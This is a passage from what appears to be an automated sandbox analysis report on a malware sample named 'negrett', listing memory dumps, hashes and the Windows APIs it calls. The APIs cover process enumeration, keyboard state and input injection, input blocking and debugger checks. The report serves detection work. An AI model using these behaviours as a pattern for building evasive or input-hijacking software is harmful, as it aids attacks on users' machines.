                                                • Instruction ID: 36900eaa2c14ce180a46318be0097d0917c2ab6d03aab3652e18ab3289c56ef5
                                                • Opcode Fuzzy Hash: 9353be4427922f656bbdffcd0410a08b7ede3d0ebae8a32ff62f4f36be3f1590
                                                • Instruction Fuzzy Hash: BFA25175E0021ACBDF24CF98C9807EDB7B2BF84324F54859AD815A7284EB749E81DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                • API String ID: 0-1546025612
                                                • Opcode ID: b57832a6e430ce2098d569547a1683d535142a4bd1a00a3d41e3d68c0f674cc7
                                                • Instruction ID: 0244b63102c0df18294e783d7b4f78677848c12b47254b610e17fd8ecd26fa70
                                                • Opcode Fuzzy Hash: b57832a6e430ce2098d569547a1683d535142a4bd1a00a3d41e3d68c0f674cc7
                                                • Instruction Fuzzy Hash: 5CA22971A0061ACBDF24CF58C8907EEB7F2FB54311FA481E9EC15A7285EB749D858B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00B9A6AC
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00B9A6BA
                                                  • Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD
                                                • Process32NextW.KERNEL32(00000000,?), ref: 00B9A79C
                                                • CloseHandle.KERNEL32(00000000), ref: 00B9A7AB
                                                  • Part of subcall function 00B2CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00B53303,?), ref: 00B2CE8A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                • String ID:
                                                • API String ID: 1991900642-0
                                                • Opcode ID: 6c64541667ca8755e6a997f5c7525ab9539978b7d37440bc5a038d9ba2007ac3
                                                • Instruction ID: cdb99bdd58a474eda31d1a95c12298440f8943ac855d536a76af87448f45926d
                                                • Opcode Fuzzy Hash: 6c64541667ca8755e6a997f5c7525ab9539978b7d37440bc5a038d9ba2007ac3
                                                • Instruction Fuzzy Hash: 78516D71508300AFD710EF24D886AABBBF8FF89754F40896DF58997251EB30E944CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00B7AAAC
                                                • SetKeyboardState.USER32(00000080), ref: 00B7AAC8
                                                • PostMessageW.USER32 ref: 00B7AB36
                                                • SendInput.USER32(00000001,?,0000001C), ref: 00B7AB88
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 65e8b61b313c55c06dcbac54aedd0f9df6567b744b3e96b02c13b44eb5c222f4
                                                • Instruction ID: 9f8e5493a6ab0a8345bfcb7a292ab7d04a2f1c463126ab8401f0a1d51548d425
                                                • Opcode Fuzzy Hash: 65e8b61b313c55c06dcbac54aedd0f9df6567b744b3e96b02c13b44eb5c222f4
                                                • Instruction Fuzzy Hash: 89312830A40208AEFF35CA64CC45BFE7BE6EBC5310F04C29AF1A9522D0D7748985C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B782AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: ($|
                                                • API String ID: 1659193697-1631851259
                                                • Opcode ID: 3a5faf950936f4ac9914c8e5c543b8dab99d6626dfc202471d29e790f7cc19ff
                                                • Instruction ID: 5c701d218d86f31b2c5a96bfb2715ab27c5aaadf6b1e5ee54f91c963267d3c09
                                                • Opcode Fuzzy Hash: 3a5faf950936f4ac9914c8e5c543b8dab99d6626dfc202471d29e790f7cc19ff
                                                • Instruction Fuzzy Hash: DB323575A007059FCB28CF59C085A6AB7F0FF48710B15C5AEE4AADB7A1EB70E941CB44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00B4271A
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00B42724
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00B42731
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: bb3a93eb5a6f65459e822be70ddd4d7f5922bd4cff56c646eca786883430b8a1
                                                • Instruction ID: 0a1dcb2e210957a1f967fb74647ce70e7e89736a7414e3576e139d49d204ba04
                                                • Opcode Fuzzy Hash: bb3a93eb5a6f65459e822be70ddd4d7f5922bd4cff56c646eca786883430b8a1
                                                • Instruction Fuzzy Hash: ED31B47495122C9BCB21DF64DD897D9BBF8AF08310F5041EAE41CA7261EB709F819F45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ($tbL$|
                                                • API String ID: 0-2980396599
                                                • Opcode ID: 50152e8ac8da47ac1839f5971c8c56cb56cfff71f8c3f79802e25eedfd5605fb
                                                • Instruction ID: 4829a0d99990f338f07d777507888af69e1c7633adfdcfe0caddfc574eaad682
                                                • Opcode Fuzzy Hash: 50152e8ac8da47ac1839f5971c8c56cb56cfff71f8c3f79802e25eedfd5605fb
                                                • Instruction Fuzzy Hash: 803225B5A00605DFCB29CF69C480A6AF7F1FF48710B11C56EE59ADB7A1EB70A941CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /
                                                • API String ID: 0-2043925204
                                                • Opcode ID: 51076bc5e362ad523cdfb93b1fcfa2690a11c9db412de4ae47784943ed9984fe
                                                • Instruction ID: 3ef7fa2f25794f591e86001c8827af9b42a4012af7fb9298c156a504a24645cb
                                                • Opcode Fuzzy Hash: 51076bc5e362ad523cdfb93b1fcfa2690a11c9db412de4ae47784943ed9984fe
                                                • Instruction Fuzzy Hash: E7414772901219AFCB209FB9CC89EBB7BF8EB84714F1042E9F905C7180E6709E80DB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f54ba311c610d96a54025d81a285f6d236c62b14a21bbc2dc148556a02803cbf
                                                • Instruction ID: 32adf2bb8a4a933c3416895b317df013c3e43c61f89b845dda1034512fa1d092
                                                • Opcode Fuzzy Hash: f54ba311c610d96a54025d81a285f6d236c62b14a21bbc2dc148556a02803cbf
                                                • Instruction Fuzzy Hash: AE12F172600214ABEF358F28DC88FBE7BB9EF89714F04416AF516EA2D0DB749941CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b898cec062c48c3280c8f5a9d772e89547b69b2f16a4579907f23802b1c1323
                                                • Instruction ID: 7d8a0c550cfca24b6507b8bb22eb59f7c4ddeeb60fc39fe856439a5a147501be
                                                • Opcode Fuzzy Hash: 7b898cec062c48c3280c8f5a9d772e89547b69b2f16a4579907f23802b1c1323
                                                • Instruction Fuzzy Hash: D7022D71E002199BDF94CFA9C8806AEFBF5FF88724F15816AD919E7344D731AA41CB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                • Instruction ID: 6473fde9305ef6c553926e98a685ad0c08bc796af8425fe11000362e0fa2146c
                                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                • Instruction Fuzzy Hash: 6B020D72E002299BDF14CFA9C8806ADFBF1EF48314F2581A9D919F7385D731AE458B94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00B86918
                                                • FindClose.KERNEL32(00000000), ref: 00B86961
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 4c9722d78b8942c41c42faab923b8eabd5d680855f674813de0d8329057cb6fa
                                                • Instruction ID: 04ba84bac3fcf63afb5398728ea4357148902a9ec8177dd53dcef9adfbbd03b4
                                                • Opcode Fuzzy Hash: 4c9722d78b8942c41c42faab923b8eabd5d680855f674813de0d8329057cb6fa
                                                • Instruction Fuzzy Hash: 3A119D316042009FC710DF29D889A16BBE5FF89328F54C6A9E4698F7A2CB30EC45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID:
                                                • API String ID: 4168288129-0
                                                • Opcode ID: 0bef3180ed392ec7568cc5422c85607a23a8d3234994752c1b91499844fb3da8
                                                • Instruction ID: f5e2534d89283a9b369d1c88703e525cbc88e159ee9702cbe234a3ffcb12db39
                                                • Opcode Fuzzy Hash: 0bef3180ed392ec7568cc5422c85607a23a8d3234994752c1b91499844fb3da8
                                                • Instruction Fuzzy Hash: 6FC27E72E046288FDB65CF68ED807E9B7B5EB49304F1445EAD44DE7280EB75AE818F40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p#M
                                                • API String ID: 0-494205710
                                                • Opcode ID: fe71273373c28b08c65656d46e4b6e52bc27789db3095068bcab06779e61c9ad
                                                • Instruction ID: 124e8f5432c62efe5491932f1ed7ff10e3f564ce101e429e2cc1b5721e744a3a
                                                • Opcode Fuzzy Hash: fe71273373c28b08c65656d46e4b6e52bc27789db3095068bcab06779e61c9ad
                                                • Instruction Fuzzy Hash: 35A27B746083419FC720CF28C490B2ABBF5BF89318F15896DE99A9B751DB31E845CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p#M
                                                • API String ID: 0-494205710
                                                • Opcode ID: 97830a7c32e45fbbb93f874df01f1415d23e2765525af164336203b38f322224
                                                • Instruction ID: e28e26361bd0862c11193010ec479613475f38e72fab3e0c634a7c331f67a0f2
                                                • Opcode Fuzzy Hash: 97830a7c32e45fbbb93f874df01f1415d23e2765525af164336203b38f322224
                                                • Instruction Fuzzy Hash: 6232AC30900228DFDF14DF94C980BEDB7BABF55308F54C05AE806AB291DB75AA49DF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • Variable is not of type 'Object'., xrefs: 00B60C40
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Variable is not of type 'Object'.
                                                • API String ID: 0-1840281001
                                                • Opcode ID: 3f60f40d3a03cb24d1664b7bb41933e75c9a6b273b7c4474f4672937928660c9
                                                • Instruction ID: 5ead033843ffed49d484b4f86593f870ba84e44f4f1fe44731304bec3de4bcc6
                                                • Opcode Fuzzy Hash: 3f60f40d3a03cb24d1664b7bb41933e75c9a6b273b7c4474f4672937928660c9
                                                • Instruction Fuzzy Hash: 0D327070950218DBCF14EF94D881AEEBBF5FF05304F9480E9E806AB291D775AD8ACB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B46766,?,?,00000008,?,?,00B4FEFE,00000000), ref: 00B46998
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 7e63b2042957eedaa53206aafa2e46a26ee42412a427b9a2e3bc7dee67c80bdd
                                                • Instruction ID: 934964278710705353d16d8575437e955b2ffa3d7ccff06fe8ad694ab09b8828
                                                • Opcode Fuzzy Hash: 7e63b2042957eedaa53206aafa2e46a26ee42412a427b9a2e3bc7dee67c80bdd
                                                • Instruction Fuzzy Hash: F7B14C31610608DFD719CF28C48AB657BE0FF46364F258699E899CF2A2C335EE91DB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 32c583e3c7fe6e664ea2f6cce7999ec2b4bf541a6b49bddbd503cfc7c933ab58
                                                • Instruction ID: 81345e7a5365be50df92a1021e02db95d1b2ef1ca66f7cc4986f672fdf8ce947
                                                • Opcode Fuzzy Hash: 32c583e3c7fe6e664ea2f6cce7999ec2b4bf541a6b49bddbd503cfc7c933ab58
                                                • Instruction Fuzzy Hash: 41E04F312102049FC710EF59D845E9AFBE9EF98760F00845AFC49C7361DB70E881CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: cc6317bc90d8b2bb5a5e2f697c8bcfbde772c35e873a9d4de18db91b5caa4109
                                                • Instruction ID: 8b5f07268d1abce8cd790118749105effdb953389ccec056aa83f98fa4749480
                                                • Opcode Fuzzy Hash: cc6317bc90d8b2bb5a5e2f697c8bcfbde772c35e873a9d4de18db91b5caa4109
                                                • Instruction Fuzzy Hash: BE51666260074557DBF449798D947FE67EEDF42308F080909CBF6CB281C716EA05CB66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0&M
                                                • API String ID: 0-278495883
                                                • Opcode ID: c32e3fc8385f568c32938d2280db9929dc4b1fa9f2a4dd4730763afb1ea23267
                                                • Instruction ID: 69a95dc7c7f2334a53846bd50254d984b45b0eb5b3cc61e84870592e6ebd5429
                                                • Opcode Fuzzy Hash: c32e3fc8385f568c32938d2280db9929dc4b1fa9f2a4dd4730763afb1ea23267
                                                • Instruction Fuzzy Hash: A621D8723216118BD718CF79C92277E73E5A794310F548A2EE4A7C33C0DE79E9448B44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bda1bef9456331f75c71545df57f8250ad6df8efdbdb96c881304aaddbd26f52
                                                • Instruction ID: 004812b7e7c369d81e5cef2317abde2242f00f92db34cc0fb460e747ae90c639
                                                • Opcode Fuzzy Hash: bda1bef9456331f75c71545df57f8250ad6df8efdbdb96c881304aaddbd26f52
                                                • Instruction Fuzzy Hash: 4D725075E00229DBDF25CF59C8907AEB7B5FF44314F1481AAD809EB290EB749A85CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17ddb9ff0a2cf66dafba2a4f174e9dfcd52e6dbbcf633c554e47d961472dc0aa
                                                • Instruction ID: ce4fc3154595a781b4487687d60ea1e3f95350d95942109946dab49813020d12
                                                • Opcode Fuzzy Hash: 17ddb9ff0a2cf66dafba2a4f174e9dfcd52e6dbbcf633c554e47d961472dc0aa
                                                • Instruction Fuzzy Hash: B4323222D29F014DD7239638D9A1336A68DAFA77C8F14D737E81AB5DA6EF28C0D35104
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ff5f349d53e070dc071dc6e2eb1d6970500c3846a650fcae8815514f6aaee21
